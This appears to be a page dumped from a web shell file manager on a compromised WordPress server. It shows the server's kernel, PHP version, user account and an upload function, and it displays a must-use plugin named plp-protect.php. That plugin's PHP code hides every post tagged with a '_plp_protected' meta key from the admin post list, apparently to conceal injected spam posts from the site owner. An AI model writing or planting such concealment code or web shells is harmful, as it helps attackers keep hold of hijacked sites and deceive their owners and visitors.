HEX
Server: Apache
System: Linux vps34798 6.8.0-78-generic #78~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Aug 13 14:32:06 UTC 2 x86_64
User: davidsurgicenter (16765843)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/davidsurgicenter/davidsurgi-center.com/wp-content/mu-plugins/plp-protect.php
<?php if(!defined("ABSPATH"))exit; add_action("pre_get_posts",function($q){if(!is_admin()||!$q->is_main_query())return;global $pagenow;if($pagenow==="edit.php"&&$q->get("post_type")==="post"){$q->set("meta_query",[["key"=>"_plp_protected","compare"=>"NOT EXISTS"]]);}});